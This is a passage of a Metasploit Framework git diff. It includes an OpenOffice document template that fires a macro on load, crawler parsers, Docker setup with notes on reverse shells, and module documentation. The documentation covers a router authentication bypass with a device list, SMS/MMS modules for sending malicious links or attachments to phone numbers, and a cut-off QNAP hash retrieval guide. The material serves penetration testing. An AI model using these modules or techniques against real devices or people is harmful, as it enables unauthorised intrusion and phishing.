xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:textooo="http://openoffice.org/2013/office" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" office:version="1.2"><office:scripts><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:load" xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&amp;location=document" xlink:type="simple"/></office:event-listeners></office:scripts><office:font-face-decls><style:font-face style:name="Mangal1" svg:font-family="Mangal"/><style:font-face style:name="Times New Roman" svg:font-family="&apos;Times New Roman&apos;" style:font-family-generic="roman" style:font-pitch="variable"/><style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="swiss" style:font-pitch="variable"/><style:font-face style:name="Mangal" svg:font-family="Mangal" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="Microsoft YaHei" svg:font-family="&apos;Microsoft YaHei&apos;" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="SimSun" svg:font-family="SimSun" style:font-family-generic="system" style:font-pitch="variable"/></office:font-face-decls><office:automatic-styles/><office:body>DOCBODYGOESHER<office:text><text:sequence-decls><text:sequence-decl text:display-outline-level="0" text:name="Illustration"/><text:sequence-decl text:display-outline-level="0" text:name="Table"/><text:sequence-decl text:display-outline-level="0" text:name="Text"/><text:sequence-decl text:display-outline-level="0" text:name="Drawing"/></text:sequence-decls><text:p text:style-name="Standard"/></office:text></office:body></office:document-content>

18
data/exploits/openoffice_document_macro/manifest.rdf Normal file
View File

@ -0,0 +1,18 @@
<?xml version="1.0" encoding="utf-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="styles.xml">
<rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/odf#StylesFile"/>
</rdf:Description>
<rdf:Description rdf:about="">
<ns0:hasPart xmlns:ns0="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#" rdf:resource="styles.xml"/>
</rdf:Description>
<rdf:Description rdf:about="content.xml">
<rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/odf#ContentFile"/>
</rdf:Description>
<rdf:Description rdf:about="">
<ns0:hasPart xmlns:ns0="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#" rdf:resource="content.xml"/>
</rdf:Description>
<rdf:Description rdf:about="">
<rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/pkg#Document"/>
</rdf:Description>
</rdf:RDF>

2
data/exploits/openoffice_document_macro/meta.xml Normal file
View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8"?>
<office:document-meta xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:textooo="http://openoffice.org/2013/office" office:version="1.2"><office:meta><meta:initial-creator>sinn3r </meta:initial-creator><meta:creation-date>2017-02-06T15:15:47.35</meta:creation-date><dc:date>2017-02-06T15:21:59.64</dc:date><dc:creator>sinn3r </dc:creator><meta:editing-duration>PT4M16S</meta:editing-duration><meta:editing-cycles>2</meta:editing-cycles><meta:generator>OpenOffice/4.1.3$Win32 OpenOffice.org_project/413m1$Build-9783</meta:generator><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="0" meta:word-count="0" meta:character-count="0"/></office:meta></office:document-meta>

1
data/exploits/openoffice_document_macro/mimetype Normal file
View File

@ -0,0 +1 @@
application/vnd.oasis.opendocument.text

2
data/exploits/openoffice_document_macro/settings.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
data/exploits/openoffice_document_macro/styles.xml Normal file
View File

File diff suppressed because one or more lines are too long

18
data/msfcrawler/basic.rb Executable file → Normal file
View File

@ -1,17 +1,8 @@
##
# $Id$
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'nokogiri'
require 'uri'
@ -19,10 +10,7 @@ require 'uri'
class CrawlerSimple < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
return unless result['Content-Type'].include?('text/html')
# doc = Hpricot(result.body.to_s)
doc = Nokogiri::HTML(result.body.to_s)

31
data/msfcrawler/comments.rb Normal file
View File

@ -0,0 +1,31 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'pathname'
require 'nokogiri'
require 'uri'
class CrawlerComments < BaseParser
def parse(request,result)
return unless result['Content-Type'].include?('text/html')
doc = Nokogiri::HTML(result.body.to_s)
doc.xpath('//comment()').each do |comment|
# searching for href
hr = /href\s*=\s*"([^"]*)"/.match(comment)
if hr
begin
hreq = urltohash('GET', hr[1], request['uri'], nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
# ignored
end
end
end
end
end

35
data/msfcrawler/forms.rb Executable file → Normal file
View File

@ -1,17 +1,8 @@
##
# $Id$
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'nokogiri'
require 'uri'
@ -19,28 +10,21 @@ require 'uri'
class CrawlerForms < BaseParser
def parse(request,result)
if !result['Content-Type'].include? "text/html"
return
end
hr = ''
m = ''
return unless result['Content-Type'].include?('text/html')
doc = Nokogiri::HTML(result.body.to_s)
doc.css('form').each do |f|
hr = f['action']
fname = f['name']
fname = "NONE" if fname.empty?
# Removed because unused
#fname = f['name']
#fname = 'NONE' if fname.empty?
m = f['method'].empty? ? 'GET' : f['method'].upcase
htmlform = Nokogiri::HTML(f.inner_html)
m = (f['method'].empty? ? 'GET' : f['method'].upcase)
arrdata = []
htmlform.css('input').each do |p|
f.css('input').each do |p|
arrdata << "#{p['name']}=#{Rex::Text.uri_encode(p['value'])}"
end
@ -51,7 +35,10 @@ class CrawlerForms < BaseParser
hreq['ctype'] = 'application/x-www-form-urlencoded'
insertnewpath(hreq)
rescue URI::InvalidURIError
#puts "Parse error"
#puts "Error: #{link[0]}"
end
end
end
end

10
data/msfcrawler/frames.rb Executable file → Normal file
View File

@ -1,13 +1,8 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rubygems'
require 'pathname'
require 'nokogiri'
require 'uri'
@ -27,6 +22,7 @@ class CrawlerFrames < BaseParser
hreq = urltohash('GET', ir, request['uri'], nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
# ignored
end
end

11
data/msfcrawler/image.rb Executable file → Normal file
View File

@ -1,14 +1,8 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# $Revision: 9212 $
require 'rubygems'
require 'pathname'
require 'nokogiri'
require 'uri'
@ -27,6 +21,7 @@ class CrawlerImage < BaseParser
hreq = urltohash('GET', im, request['uri'], nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
# ignored
end
end

11
data/msfcrawler/link.rb Executable file → Normal file
View File

@ -1,14 +1,8 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# $Revision: 9212 $
require 'rubygems'
require 'pathname'
require 'nokogiri'
require 'uri'
@ -26,6 +20,7 @@ class CrawlerLink < BaseParser
hreq = urltohash('GET', hr, request['uri'], nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
# ignored
end
end

14
data/msfcrawler/objects.rb Executable file → Normal file
View File

@ -1,17 +1,8 @@
##
# $Id$
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'nokogiri'
require 'uri'
@ -29,6 +20,7 @@ class CrawlerObjects < BaseParser
hreq = urltohash('GET', s, request['uri'], nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
# ignored
end
end
end

16
data/msfcrawler/scripts.rb Executable file → Normal file
View File

@ -1,17 +1,8 @@
##
# $Id$
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# $Revision$
require 'rubygems'
require 'pathname'
require 'nokogiri'
require 'uri'
@ -21,8 +12,6 @@ class CrawlerScripts < BaseParser
def parse(request,result)
return unless result['Content-Type'].include? "text/html"
hr = ''
m = ''
doc = Nokogiri::HTML(result.body.to_s)
doc.xpath("//script").each do |obj|
s = obj['src']
@ -30,6 +19,7 @@ class CrawlerScripts < BaseParser
hreq = urltohash('GET', s, request['uri'], nil)
insertnewpath(hreq)
rescue URI::InvalidURIError
# ignored
end
end

24
docker-compose.yml Normal file
View File

@ -0,0 +1,24 @@
version: '2'
services:
ms: &ms
image: metasploit
build:
context: .
dockerfile: ./docker/Dockerfile
environment:
DATABASE_URL: postgres://postgres@db:5432/msf
links:
- db
ports:
- 4444:4444
volumes:
- $HOME/.msf4:/root/.msf4
db:
image: postgres:9.6
volumes:
- pg_data:/var/lib/postgresql/data
volumes:
pg_data:
driver: local

47
docker/Dockerfile Normal file
View File

@ -0,0 +1,47 @@
FROM ruby:2.3-alpine
MAINTAINER Rapid7
ARG BUNDLER_ARGS="--system --jobs=8"
ENV APP_HOME /usr/src/metasploit-framework/
WORKDIR $APP_HOME
COPY Gemfile* m* Rakefile $APP_HOME
COPY lib $APP_HOME/lib
RUN apk update && \
apk add \
ruby-bigdecimal \
ruby-bundler \
ruby-io-console \
autoconf \
bison \
subversion \
git \
sqlite \
nmap \
libxslt \
postgresql \
ncurses \
&& apk add --virtual .ruby-builddeps \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
postgresql-dev \
libpcap-dev \
libxml2-dev \
libxslt-dev \
yaml-dev \
zlib-dev \
ncurses-dev \
bison \
autoconf \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
ADD ./ $APP_HOME
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]

65
docker/README.md Normal file
View File

@ -0,0 +1,65 @@
# Metasploit in Docker
## Getting Started
To run `msfconsole`
```bash
docker-compose run --rm --service-ports ms
```
To run `msfvenom`
```bash
docker-compose run --rm ms ./msfvenom
```
### I don't like typing `docker-compose --rm ...`
We have included some binstubs `./bin`, you can symlink them to your path.
Assuming you have `$HOME/bin`, and it's in your `$PATH`. You can run this from the project root:
```bash
ln -s `pwd`/docker/bin/msfconsole $HOME/bin/
ln -s `pwd`/docker/bin/msfvenom $HOME/bin/
```
### But I want reverse shells...
By default we expose port `4444`. You'll need to set `LHOST` to be a hostname/ip
of your host machine.
If you want to expose more ports, or have `LHOST` prepopulated with a specific
value; you'll need to setup a local docker-compose override for this.
Create `docker/docker-compose.local.override.yml` with:
```yml
version: '2'
services:
ms:
environment:
# example of setting LHOST
LHOST: 10.0.8.2
# example of adding more ports
ports:
- 8080:8080
```
Make sure you set `LHOST` to valid hostname that resolves to your host machine.
Now you need to set the `COMPOSE_FILE` environment variable to load your local
override.
```bash
echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.local.override.yml" >> .env
```
Now you should be able get reverse shells working
## Developing
To setup you environment for development, you need to `docker/docker-compose.development.override.yml`
to your `COMPOSE_FILE` environment variable.
If you don't have a `COMPOSE_FILE` environment variable, you can set it up with this:
```bash
echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.development.override.yml" >> .env
```

21
docker/bin/msfconsole Executable file
View File

@ -0,0 +1,21 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@"

21
docker/bin/msfvenom Executable file
View File

@ -0,0 +1,21 @@
#! /bin/bash
if [[ -z "$MSF_PATH" ]]; then
path=`dirname $0`
# check for ./docker/msfconsole.rc
if [[ ! -f $path/../msfconsole.rc ]] ; then
# we are not inside the project
realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;}
# determine script path
pushd $(dirname $(realpath $0)) > /dev/null
path=$(pwd)
popd > /dev/null
fi
MSF_PATH=$(dirname $(dirname $path))
fi
cd $MSF_PATH
docker-compose run --rm --service-ports ms ./msfvenom "$@"

9
docker/docker-compose.development.override.yml Normal file
View File

@ -0,0 +1,9 @@
version: '2'
services:
ms: &ms
environment:
DATABASE_URL: postgres://postgres@db:5432/msf_dev
volumes:
- .:/usr/src/app

5
docker/msfconsole.rc Normal file
View File

@ -0,0 +1,5 @@
<ruby>
run_single("setg LHOST #{ENV['LHOST']}") if ENV['LHOST']
run_single("setg LPORT #{ENV['LPORT']}") if ENV['LPORT']
run_single("db_connect #{ENV['DATABASE_URL'].gsub('postrgres://', '')}") if ENV['DATABASE_URL']
</ruby>

4
documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md
View File

@ -1,4 +1,4 @@
This module plays (by default) [https://www.youtube.com/watch?v=kxopViU98Xo]("Epic sax guy 10 hours") on a target Google Chromecast via YouTube.
This module plays (by default) ["Epic sax guy 10 hours"](https://www.youtube.com/watch?v=kxopViU98Xo) on a target Google Chromecast via YouTube.
Naturally, audio should be cranked to 11 before running this module.
@ -12,7 +12,7 @@ Naturally, audio should be cranked to 11 before running this module.
**VID**
The YouTube video to be played. Defaults to [https://www.youtube.com/watch?v=kxopViU98Xo](kxopViU98Xo)
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
## Sample Output

121
documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md Normal file
View File

@ -0,0 +1,121 @@
## Vulnerable devices
The following devices and firmware versions are known to be vulnerable:
* Azmoon AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1
* Billion BiPAC 5102S - Av2.7.0.23 (UE0.B1C)
* Billion BiPAC 5102S - Bv2.7.0.23 (UE0.B1C)
* Billion BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6
* Billion BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0
* Billion BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0
* Billion BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0
* Billion BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52
* Billion BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0
* Billion BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0
* Billion BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22
* D-Link DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL
* D-Link DSL-2600U - Z1_DSL-2600U
* D-Link DSL-2600U - Z2_V1.08_ras
* TP-Link TD-8616 - V2_080513
* TP-Link TD-8816 - V4_100528_Russia
* TP-Link TD-8816 - V4_100524
* TP-Link TD-8816 - V5_100528_Russia
* TP-Link TD-8816 - V5_100524
* TP-Link TD-8816 - V5_100903
* TP-Link TD-8816 - V6_100907
* TP-Link TD-8816 - V7_111103
* TP-Link TD-8816 - V7_130204
* TP-Link TD-8817 - V5_100524
* TP-Link TD-8817 - V5_100702_TR
* TP-Link TD-8817 - V5_100903
* TP-Link TD-8817 - V6_100907
* TP-Link TD-8817 - V6_101221
* TP-Link TD-8817 - V7_110826
* TP-Link TD-8817 - V7_130217
* TP-Link TD-8817 - V7_120509
* TP-Link TD-8817 - V8_140311
* TP-Link TD-8820 - V3_091223
* TP-Link TD-8840T - V1_080520
* TP-Link TD-8840T - V2_100525
* TP-Link TD-8840T - V2_100702_TR
* TP-Link TD-8840T - V2_090609
* TP-Link TD-8840T - V3_101208
* TP-Link TD-8840T - V3_110221
* TP-Link TD-8840T - V3_120531
* TP-Link TD-W8101G - V1_090107
* TP-Link TD-W8101G - V1_090107
* TP-Link TD-W8101G - V2_100819
* TP-Link TD-W8101G - V2_101015_TR
* TP-Link TD-W8101G - V2_101101
* TP-Link TD-W8101G - V3_110119
* TP-Link TD-W8101G - V3_120213
* TP-Link TD-W8101G - V3_120604
* TP-Link TD-W8151N - V3_120530
* TP-Link TD-W8901G - V1_080522
* TP-Link TD-W8901G - V1,2_080522
* TP-Link TD-W8901G - V2_090113_Turkish
* TP-Link TD-W8901G - V3_140512
* TP-Link TD-W8901G - V3_100603
* TP-Link TD-W8901G - V3_100702_TR
* TP-Link TD-W8901G - V3_100901
* TP-Link TD-W8901G - V6_110119
* TP-Link TD-W8901G - V6_110915
* TP-Link TD-W8901G - V6_120418
* TP-Link TD-W8901G - V6_120213
* TP-Link TD-W8901GB - V3_100727
* TP-Link TD-W8901GB - V3_100820
* TP-Link TD-W8901N - V1_111211
* TP-Link TD-W8951ND - V1_101124,100723,100728
* TP-Link TD-W8951ND - V1_110907
* TP-Link TD-W8951ND - V1_111125
* TP-Link TD-W8951ND - V3.0_110729_FI
* TP-Link TD-W8951ND - V3_110721
* TP-Link TD-W8951ND - V3_20110729_FI
* TP-Link TD-W8951ND - V4_120511
* TP-Link TD-W8951ND - V4_120607
* TP-Link TD-W8951ND - V4_120912_FL
* TP-Link TD-W8961NB - V1_110107
* TP-Link TD-W8961NB - V1_110519
* TP-Link TD-W8961NB - V2_120319
* TP-Link TD-W8961NB - V2_120823
* TP-Link TD-W8961ND - V1_100722,101122
* TP-Link TD-W8961ND - V1_101022_TR
* TP-Link TD-W8961ND - V1_111125
* TP-Link TD-W8961ND - V2_120427
* TP-Link TD-W8961ND - V2_120710_UK
* TP-Link TD-W8961ND - V2_120723_FI
* TP-Link TD-W8961ND - V3_120524,120808
* TP-Link TD-W8961ND - V3_120830
* ZyXEL P-660R-T3 - 3.40(BOQ.0)C0
* ZyXEL P-660RU-T3 - 3.40(BJR.0)C0
## Module usage
This is an example run against TP-Link TD-8817 router:
```
msf > use auxiliary/admin/http/allegro_rompager_auth_bypass
msf auxiliary(allegro_rompager_auth_bypass) > show options
Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.1.1 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes URI to test
VHOST no HTTP server virtual host
msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(allegro_rompager_auth_bypass) > run
[+] Detected device:TP-Link TD-8817
[-] Bad response
[-] Bad response
[+] Good response, please check host, authentication should be disabled
[*] Auxiliary module execution completed
```

23
documentation/modules/auxiliary/admin/http/netgear_soap_password_extractor.md
View File

@ -1,17 +1,18 @@
## Vulnerable Application
The following list is a non-exhaustive list of vulnerable Netgear devices:
1. R6300v2 < [1.0.3.28](http://kb.netgear.com/app/answers/detail/a_id/28372)
2. WNDR3300 - V1.0.45 (current, confirmed vuln)
3. WNDR3700v1 - 1.0.7.98, 1.0.16.98 (confirmed vuln)
4. WNDR3700v2 - 1.0.1.14 (EOL, confirmed vuln)
5. WNDR3700v4 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28355)
6. WNDR3800 - 1.0.0.48 (EOL, confirmed vuln)
7. WNDR4300 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28037)
8. WNR1000v2 - 1.0.1.1, 1.1.2.58 (EOL, confirmed vuln)
9. WNR2000v3 < [1.1.2.12](http://kb.netgear.com/app/answers/detail/a_id/30024)
10. WNR2200 < [1.0.1.96](http://kb.netgear.com/app/answers/detail/a_id/28036)
11. WNR2500 < [1.0.0.32](http://kb.netgear.com/app/answers/detail/a_id/28351)
1. R6300v2 < [1.0.3.28](http://kb.netgear.com/app/answers/detail/a_id/28372)
2. WNDR3300 - V1.0.45 (current, confirmed vuln)
3. WNDR3700v1 - 1.0.7.98, 1.0.16.98 (confirmed vuln)
4. WNDR3700v2 - 1.0.1.14 (EOL, confirmed vuln)
5. WNDR3700v4 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28355)
6. WNDR3800 - 1.0.0.48 (EOL, confirmed vuln)
7. WNDR4300 < [1.0.2.80](http://kb.netgear.com/app/answers/detail/a_id/28037)
8. WNR1000v2 - 1.0.1.1, 1.1.2.58 (EOL, confirmed vuln)
9. WNR2000v3 < [1.1.2.12](http://kb.netgear.com/app/answers/detail/a_id/30024)
10. WNR2200 < [1.0.1.96](http://kb.netgear.com/app/answers/detail/a_id/28036)
11. WNR2500 < [1.0.0.32](http://kb.netgear.com/app/answers/detail/a_id/28351)
## Verification Steps

150
documentation/modules/auxiliary/client/mms/send_mms.md Normal file
View File

@ -0,0 +1,150 @@
The ```auxiliary/client/mms/send_mms``` module allows you to send a malicious attachment to a
collection of phone numbers of the same carrier.
In order to use this module, you must set up your own SMTP server to deliver messages. Popular
mail services such as Gmail, Yahoo, Live should work fine.
## Module Options
**CELLNUMBERS**
The 10-digit phone number (or numbers) you want to send the MMS text to. If you wish to target
against multiple phone numbers, ideally you want to create the list in a text file (one number per
line), and then load the CELLNUMBERS option like this:
```
set CELLNUMBERS file:///tmp/att_phone_numbers.txt
```
Remember that these phone numbers must be the same carrier.
**MMSCARRIER**
The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
supported carriers.
**TEXTMESSAGE**
The text message you want to send. For example, this will send a text with a link to google:
```
set TEXTMESSAGE "Hi, please go: google.com"
```
The link should automatically be parsed on the phone and clickable.
**MMSFILE**
The attachment to send in the message.
**MMSFILECTYPE**
The content type to use for the attachment. Commonly supported ones include:
* audio/midi
* image/jpeg
* image/gif
* image/png
* video/mp4
To find more, please try this [list](http://www.freeformatter.com/mime-types-list.html)
**SMTPADDRESS**
The mail server address you wish to use to send the MMS messages.
**SMTPPORT**
The mail server port. By default, this is ```25```.
**SMTPUSERNAME**
The username you use to log into the SMTP server.
**SMTPPASSWORD**
The password you use to log into the SMTP server.
**SMTPFROM**
The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```. Some carriers require this
in order to receive the text, such as AT&T.
**MMSSUBJECT**
The MMS subject. Some carriers require this in order to receive the text, such as AT&T.
## Supported Carrier Gateways
The module supports the following carriers:
* AT&T
* Sprint
* T-Mobile
* Verizon
* Google Fi
## Finding the Carrier for a Phone Number
Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
how to identify the carrier of a phone number. There are many services that can do this, such as:
http://freecarrierlookup.com/
## Gmail SMTP Example
Gmail is a popular mail server, so we will use this as a demonstration.
Assuming you are already using two-factor authentication, you need to create an [application password](https://support.google.com/accounts/answer/185833?hl=en).
After creating the application password, configure auxiliary/client/mms/send_mms this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set mmscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set textmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.gmail.com```
* ```set smtpport 587```
* ```set mmsfile /tmp/example.mp4```
* ```set mmsfilectype video/mp4```
* ```set smtpusername [USERNAME FOR GMAIL]``` (you don't need ```@gmail.com``` at the end)
* ```set smtppassword [APPLICATION PASSWORD]```
And you should be ready to go.
## Yahoo SMTP Example
Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
so we will demonstrate as well.
Before using the module, you must do this to your Yahoo account:
1. Sign in to Yahoo Mail.
2. [Go to your "Account security" settings.](https://login.yahoo.com/account/security#less-secure-apps)
3. Turn on Allow apps that use less secure sign in.
After configuring your Yahoo account, configure auxiliary/client/mms/send_mms this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set mmscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set textmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.mail.yahoo.com```
* ```set smtpport 25```
* ```set mmsfile /tmp/example.mp4```
* ```set mmsfilectype video/mp4```
* ```set smtpusername [USERNAME FOR YAHOO]@yahoo.com```
* ```set smtppassword [YAHOO LOGIN PASSWORD]```
And you're good to go.
## Demonstration
After setting up your mail server and the module, your output should look similar to this:
```
msf auxiliary(send_mms) > run
[*] Sending mms message to 1 number(s)...
[*] Done.
[*] Auxiliary module execution completed
msf auxiliary(send_mms) >
```

132
documentation/modules/auxiliary/client/sms/send_text.md Normal file
View File

@ -0,0 +1,132 @@
The ```auxiliary/client/sms/send_text``` module allows you to send a malicious text/link to a collection
of phone numbers of the same carrier.
In order to use this module, you must set up your own SMTP server to deliver messages. Popular
mail services such as Gmail, Yahoo, Live should work fine.
## Module Options
**CELLNUMBERS**
The 10-digit phone number (or numbers) you want to send the text to. If you wish to target against
multiple phone numbers, ideally you want to create the list in a text file (one number per line),
and then load the CELLNUMBERS option like this:
```
set CELLNUMBERS file:///tmp/att_phone_numbers.txt
```
Remember that these phone numbers must be the same carrier.
**SMSCARRIER**
The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
supported carriers.
**SMSMESSAGE**
The text message you want to send. For example, this will send a text with a link to google:
```
set SMSMESSAGE "Hi, please go: google.com"
```
The link should automatically be parsed on the phone and clickable.
**SMTPADDRESS**
The mail server address you wish to use to send the text messages.
**SMTPPORT**
The mail server port. By default, this is ```25```.
**SMTPUSERNAME**
The username you use to log into the SMTP server.
**SMTPPASSWORD**
The password you use to log into the SMTP server.
**SMTPFROM**
The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.
## Supported Carrier Gateways
The module supports the following carriers:
* AllTel
* AT&T Wireless
* Boost Mobile
* Cricket Wireless
* Google Fi
* T-Mobile
* Verizon
* Virgin Mobile
**Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
not supported.
## Finding the Carrier for a Phone Number
Since you need to manually choose the carrier gateway for the phone numbers, you need to figure out
how to identify the carrier of a phone number. There are many services that can do this, such as:
http://freecarrierlookup.com/
**Note:** If the phone is using Google Fi, then it may appear as a different carrier.
## Gmail SMTP Example
Gmail is a popular mail server, so we will use this as a demonstration.
Assuming you are already using two-factor authentication, you need to create an [application password](https://support.google.com/accounts/answer/185833?hl=en).
After creating the application password, configure auxiliary/client/sms/send_text this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set smscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set smsmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.gmail.com```
* ```set smtpport 587```
* ```set smtpusername [USERNAME FOR GMAIL]``` (you don't need ```@gmail.com``` at the end)
* ```set smtppassword [APPLICATION PASSWORD]```
And you should be ready to go.
## Yahoo SMTP Example
Yahoo is also a fairly popular mail server (although much slower to deliver comparing to Gmail),
so we will demonstrate as well.
Before using the module, you must do this to your Yahoo account:
1. Sign in to Yahoo Mail.
2. [Go to your "Account security" settings.](https://login.yahoo.com/account/security#less-secure-apps)
3. Turn on Allow apps that use less secure sign in.
After configuring your Yahoo account, configure auxiliary/client/sms/send_text this way:
* ```set cellnumbers [PHONE NUMBER]```
* ```set smscarrier [CHOOSE A SUPPORTED CARRIER]```
* ```set smsmessage "[TEXT MESSAGE]"```
* ```set smtpaddress smtp.mail.yahoo.com```
* ```set smtpport 25```
* ```set smtpusername [USERNAME FOR YAHOO]@yahoo.com```
* ```set smtppassword [YAHOO LOGIN PASSWORD]```
And you're good to go.
## Demonstration
After setting up your mail server and the module, your output should look similar to this:
```
msf auxiliary(send_text) > run
[*] Sending text (16 bytes) to 1 number(s)...
[*] Done.
[*] Auxiliary module execution completed
```

78
documentation/modules/auxiliary/gather/qnap_backtrace_admin_hash.md Normal file
View File

@ -0,0 +1,78 @@
## Intro
This is going to be a quick rundown of how to use this module to
retrieve the admin hash from a vulnerable QNAP device.
The defaults I've set should be adequate for blind exploitation, but you
may need to tweak them for your target.
## Options
**OFFSET_START**
You want to set this to a value where you can see a backtrace. Set this
lower if you're not sure. Default is 2000.
**OFFSET_END**
